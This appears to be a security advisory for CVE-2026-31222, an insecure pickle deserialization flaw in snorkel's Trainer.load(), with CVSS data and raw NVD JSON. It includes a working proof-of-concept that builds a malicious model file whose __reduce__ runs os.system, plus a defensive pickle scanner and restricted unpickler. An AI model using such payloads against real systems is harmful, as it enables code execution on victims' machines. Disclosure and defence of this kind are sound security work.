Security Vulnerability Report
CVE-2026-31222 CVSS 8.8 HIGH


Published: 2026-05-12 16:16:14
Last Modified: 2026-05-13 15:47:09

Description

The snorkel library through v0.10.0 contains an insecure deserialization vulnerability (CWE-502) in the Trainer.load() method of the Trainer class. The method loads model checkpoint files using torch.load() without enabling the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:* - VULNERABLE
snorkel <= 0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
import torch
import pickle

# Define a malicious class that executes code upon deserialization
class MaliciousPayload:
    def __reduce__(self):
        # The command to execute (e.g., creating a file or running a shell)
        # In a real attack, this might be a reverse shell
        return (os.system, ('echo "CVE-2026-31222 Exploited" > /tmp/pwned.txt',))

# Create the malicious object
malicious_obj = MaliciousPayload()

# Save the object using torch.save (which uses pickle internally)
# This simulates a crafted model file
print("[*] Creating malicious model file...")
torch.save(malicious_obj, 'malicious_model.pt')
print("[+] File 'malicious_model.pt' created successfully.")
print("[*] When a victim loads this file using Trainer.load(), the command will execute.")

# Simulation of the vulnerable load (commented out for safety)
# trainer = Trainer()
# trainer.load('malicious_model.pt')
```
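Added example (not code from the advisory or the snorkel project) covering the description above and the PoC: a static check that lists the globals a checkpoint's pickle stream would import before anything is loaded, beside a restricted unpickler that applies the same allowlisting weights_only=True performs, and the unrestricted load that the vulnerable Trainer.load() path amounts to. It assumes a bare pickle stream rather than torch's zip container (whose data.pkl entry would be extracted first); ALLOWED, Payload and the two sample blobs are constructed for the demonstration.

```python
import io
import pickle
import pickletools
from collections import OrderedDict

# Constructed allowlist for this example; a real loader would enumerate the
# tensor-rebuild helpers its framework needs and nothing more.
ALLOWED = {("collections", "OrderedDict")}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

def unsafe_globals(pkl: bytes) -> list:
    # Statically list every non-allowlisted (module, name) the stream would
    # import, without running it. GLOBAL carries both names in its argument;
    # STACK_GLOBAL pops the two latest strings, which protocol 4 memoizes on
    # push and may re-fetch with BINGET, so the memo is tracked as well.
    found, strings, memo, n, prev_str = [], [], {}, 0, False
    for op, arg, _ in pickletools.genops(pkl):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name == "MEMOIZE":
            if prev_str:
                memo[n] = strings[-1]
            n += 1
        elif op.name in ("BINGET", "LONG_BINGET") and arg in memo:
            strings.append(memo[arg])
        elif op.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        prev_str = op.name in STRING_OPS
    return [g for g in found if g not in ALLOWED]

class RestrictedUnpickler(pickle.Unpickler):
    # The mechanism behind weights_only=True: every global is checked against
    # the allowlist, so a __reduce__ payload never obtains a callable.
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")

def safe_load(pkl: bytes):
    return RestrictedUnpickler(io.BytesIO(pkl)).load()

def unrestricted_load(pkl: bytes):
    # The vulnerable pattern: torch.load() without weights_only=True ends in a
    # plain pickle load, which calls whatever callable __reduce__ named.
    return pickle.load(io.BytesIO(pkl))

class Payload:  # constructed stand-in for the advisory's payload
    def __reduce__(self):
        return (print, ("payload executed during load",))

BENIGN = pickle.dumps(OrderedDict(w=[1.0, 2.0]))  # state-dict-like content
MALICIOUS = pickle.dumps(Payload())
```

Running unsafe_globals() over a file before loading gives the rejection reason a reviewer can act on, while safe_load() enforces it at load time.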

References

https://github.com/snorkel-team/snorkel (Product)
https://www.notion.so/CVE-2026-31222-35d1e139318881db8398e0732af8df6d (Third Party Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-31222", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:14.120", "lastModified": "2026-05-13T15:47:09.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The snorkel library thru v0.10.0 contains an insecure deserialization vulnerability (CWE-502) in the Trainer.load() method of the Trainer class. The method loads model checkpoint files using torch.load() without enabling the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.10.0", "matchCriteriaId": "F2E7FC3A-64C0-4F69-84DD-FC9BA0883D08"}]}]}], "references": [{"url": "https://github.com/snorkel-team/snorkel", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.notion.so/CVE-2026-31222-35d1e139318881db8398e0732af8df6d", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```